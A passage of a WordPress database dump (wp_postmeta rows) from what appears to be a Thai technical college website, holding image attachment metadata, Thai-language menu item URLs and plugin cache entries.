(3381, 938, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:711;s:6:\"height\";i:536;s:4:\"file\";s:29:\"2018/02/2-2-2561-13-27-51.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-27-51-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-27-51-300x226.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-27-51-398x300.jpg\";s:5:\"width\";i:398;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3382, 939, '_wp_attached_file', '2018/02/2-2-2561-13-28-48.jpg'),
(3383, 939, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:707;s:6:\"height\";i:535;s:4:\"file\";s:29:\"2018/02/2-2-2561-13-28-48.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-28-48-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-28-48-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-28-48-396x300.jpg\";s:5:\"width\";i:396;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3386, 941, '_wp_attached_file', '2018/02/2-2-2561-13-23-39.jpg'),
(3387, 941, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:690;s:6:\"height\";i:527;s:4:\"file\";s:29:\"2018/02/2-2-2561-13-23-39.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-23-39-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-23-39-300x229.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-2-2561-13-23-39-393x300.jpg\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3388, 930, '_hide_featured', NULL),
(3389, 930, '_publicize_pending', '1'),
(3390, 944, '_edit_lock', '1517559967:3'),
(3391, 944, '_edit_last', '3'),
(3392, 944, '_publicize_pending', '1'),
(3393, 944, '_hide_featured', NULL),
(3394, 946, '_menu_item_type', 'custom'),
(3395, 946, '_menu_item_menu_item_parent', '848'),
(3396, 946, '_menu_item_object_id', '946'),
(3397, 946, '_menu_item_object', 'custom'),
(3398, 946, '_menu_item_target', ''),
(3399, 946, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3400, 946, '_menu_item_xfn', ''),
(3401, 946, '_menu_item_url', 'http://km.technicrayong.ac.th/login.php'),
(3403, 946, '_publicize_pending', '1'),
(3404, 926, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575697939;s:7:\"payload\";a:1:{i:0;a:1:{s:2:\"id\";i:4260;}}}}'),
(3405, 924, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575026751;s:7:\"payload\";a:1:{i:0;a:1:{s:2:\"id\";i:4260;}}}}'),
(3408, 947, '_wp_attached_file', '2018/02/5-2-2561-11-13-28.jpg'),
(3409, 947, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:838;s:6:\"height\";i:351;s:4:\"file\";s:29:\"2018/02/5-2-2561-11-13-28.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-2-2561-11-13-28-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"5-2-2561-11-13-28-300x126.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:126;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"5-2-2561-11-13-28-768x322.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:322;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-2-2561-11-13-28-400x168.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3410, 952, '_wp_attached_file', '2018/02/5-2-2561-14-10-53.jpg'),
(3411, 952, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:826;s:6:\"height\";i:530;s:4:\"file\";s:29:\"2018/02/5-2-2561-14-10-53.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-10-53-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-10-53-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-10-53-768x493.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:493;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-10-53-400x257.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:257;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3412, 953, '_wp_attached_file', '2018/02/5-2-2561-14-11-26.jpg'),
(3413, 953, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:819;s:6:\"height\";i:557;s:4:\"file\";s:29:\"2018/02/5-2-2561-14-11-26.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-11-26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-11-26-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-11-26-768x522.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-11-26-400x272.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3414, 954, '_wp_attached_file', '2018/02/5-2-2561-14-11-46.jpg'),
(3415, 954, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:831;s:6:\"height\";i:576;s:4:\"file\";s:29:\"2018/02/5-2-2561-14-11-46.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-11-46-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-11-46-300x208.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-11-46-768x532.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:532;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-2-2561-14-11-46-400x277.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3416, 748, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575635277;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4945;}i:1;a:1:{s:2:\"id\";i:4711;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(3417, 956, '_menu_item_type', 'custom'),
(3418, 956, '_menu_item_menu_item_parent', '810'),
(3419, 956, '_menu_item_object_id', '956'),
(3420, 956, '_menu_item_object', 'custom'),
(3421, 956, '_menu_item_target', ''),
(3422, 956, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3423, 956, '_menu_item_xfn', ''),
(3424, 956, '_menu_item_url', '/%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A7%E0%B8%B1%E0%B8%95%E0%B8%B4%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%B2%E0%B8%A5%E0%B8%B1%E0%B8%A2/'),
(3426, 957, '_menu_item_type', 'custom'),
(3427, 957, '_menu_item_menu_item_parent', '810'),
(3428, 957, '_menu_item_object_id', '957'),
(3429, 957, '_menu_item_object', 'custom'),
(3430, 957, '_menu_item_target', ''),
(3431, 957, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3432, 957, '_menu_item_xfn', ''),
(3433, 957, '_menu_item_url', '/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/'),
(3435, 958, '_menu_item_type', 'custom'),
(3436, 958, '_menu_item_menu_item_parent', '810'),
(3437, 958, '_menu_item_object_id', '958'),
(3438, 958, '_menu_item_object', 'custom'),
(3439, 958, '_menu_item_target', ''),
(3440, 958, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3441, 958, '_menu_item_xfn', ''),
(3442, 958, '_menu_item_url', '/พันธกิจ'),
(3444, 959, '_menu_item_type', 'custom'),
(3445, 959, '_menu_item_menu_item_parent', '810'),
(3446, 959, '_menu_item_object_id', '959'),
(3447, 959, '_menu_item_object', 'custom'),
(3448, 959, '_menu_item_target', ''),
(3449, 959, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3450, 959, '_menu_item_xfn', ''),
(3451, 959, '_menu_item_url', '/ปรัชญา/'),
(3453, 960, '_menu_item_type', 'custom'),
(3454, 960, '_menu_item_menu_item_parent', '810'),
(3455, 960, '_menu_item_object_id', '960'),
(3456, 960, '_menu_item_object', 'custom'),
(3457, 960, '_menu_item_target', ''),
(3458, 960, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3459, 960, '_menu_item_xfn', ''),
(3460, 960, '_menu_item_url', '/เอกลักษณ์/'),
(3462, 961, '_menu_item_type', 'custom'),
(3463, 961, '_menu_item_menu_item_parent', '810'),
(3464, 961, '_menu_item_object_id', '961'),
(3465, 961, '_menu_item_object', 'custom'),
(3466, 961, '_menu_item_target', ''),
(3467, 961, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3468, 961, '_menu_item_xfn', ''),
(3469, 961, '_menu_item_url', '/อัตลักษณ์'),
(3471, 962, '_menu_item_type', 'custom'),
(3472, 962, '_menu_item_menu_item_parent', '810'),
(3473, 962, '_menu_item_object_id', '962'),
(3474, 962, '_menu_item_object', 'custom'),
(3475, 962, '_menu_item_target', ''),
(3476, 962, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3477, 962, '_menu_item_xfn', ''),
(3478, 962, '_menu_item_url', '/แผนที่ตั้งวิทยาลัยฯ'),
(3480, 956, '_publicize_pending', '1'),
(3481, 957, '_publicize_pending', '1'),
(3482, 958, '_publicize_pending', '1'),
(3483, 959, '_publicize_pending', '1'),
(3484, 960, '_publicize_pending', '1'),
(3485, 961, '_publicize_pending', '1'),
(3486, 962, '_publicize_pending', '1'),
(3499, 969, '_wp_attached_file', '2018/02/6-2-2561-9-39-52-1.jpg'),
(3500, 969, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:252;s:6:\"height\";i:136;s:4:\"file\";s:30:\"2018/02/6-2-2561-9-39-52-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-2-2561-9-39-52-1-150x136.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:136;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3501, 970, '_wp_attached_file', '2018/02/6-2-2561-9-41-23-1.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(3502, 970, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:254;s:6:\"height\";i:134;s:4:\"file\";s:30:\"2018/02/6-2-2561-9-41-23-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-2-2561-9-41-23-1-150x134.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3503, 971, '_wp_attached_file', '2018/02/6-2-2561-9-32-58-1.jpg'),
(3504, 971, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:254;s:6:\"height\";i:137;s:4:\"file\";s:30:\"2018/02/6-2-2561-9-32-58-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-2-2561-9-32-58-1-150x137.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3505, 972, '_wp_attached_file', '2018/02/6-2-2561-9-34-49-1.jpg'),
(3506, 972, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:250;s:6:\"height\";i:137;s:4:\"file\";s:30:\"2018/02/6-2-2561-9-34-49-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-2-2561-9-34-49-1-150x137.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3507, 973, '_wp_attached_file', '2018/02/6-2-2561-9-36-58-1.jpg'),
(3508, 973, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:252;s:6:\"height\";i:136;s:4:\"file\";s:30:\"2018/02/6-2-2561-9-36-58-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-2-2561-9-36-58-1-150x136.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:136;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3509, 974, '_wp_attached_file', '2018/02/6-2-2561-9-38-34-1.jpg'),
(3510, 974, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:253;s:6:\"height\";i:136;s:4:\"file\";s:30:\"2018/02/6-2-2561-9-38-34-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-2-2561-9-38-34-1-150x136.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:136;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3511, 978, '_wp_attached_file', '2018/02/6-2-2561-10-21-55.jpg'),
(3512, 978, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:450;s:6:\"height\";i:492;s:4:\"file\";s:29:\"2018/02/6-2-2561-10-21-55.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-21-55-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-21-55-274x300.jpg\";s:5:\"width\";i:274;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-21-55-274x300.jpg\";s:5:\"width\";i:274;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3513, 979, '_wp_attached_file', '2018/02/6-2-2561-10-32-17.jpg'),
(3514, 979, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:439;s:6:\"height\";i:486;s:4:\"file\";s:29:\"2018/02/6-2-2561-10-32-17.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-32-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-32-17-271x300.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-32-17-271x300.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3515, 980, '_wp_attached_file', '2018/02/6-2-2561-10-33-14.jpg'),
(3516, 980, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:441;s:6:\"height\";i:490;s:4:\"file\";s:29:\"2018/02/6-2-2561-10-33-14.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-33-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-33-14-270x300.jpg\";s:5:\"width\";i:270;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-33-14-270x300.jpg\";s:5:\"width\";i:270;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3517, 981, '_wp_attached_file', '2018/02/6-2-2561-10-34-02.jpg'),
(3518, 981, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:440;s:6:\"height\";i:486;s:4:\"file\";s:29:\"2018/02/6-2-2561-10-34-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-34-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-34-02-272x300.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"6-2-2561-10-34-02-272x300.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3519, 982, '_edit_lock', '1636341650:14'),
(3520, 982, '_edit_last', '14'),
(3523, 982, '_hide_featured', NULL),
(3524, 985, '_wp_attached_file', '2018/02/6-2-2561-10-50-51-1.jpg'),
(3525, 985, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:548;s:6:\"height\";i:133;s:4:\"file\";s:31:\"2018/02/6-2-2561-10-50-51-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"6-2-2561-10-50-51-1-150x133.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"6-2-2561-10-50-51-1-300x73.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:73;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"6-2-2561-10-50-51-1-400x97.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:97;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
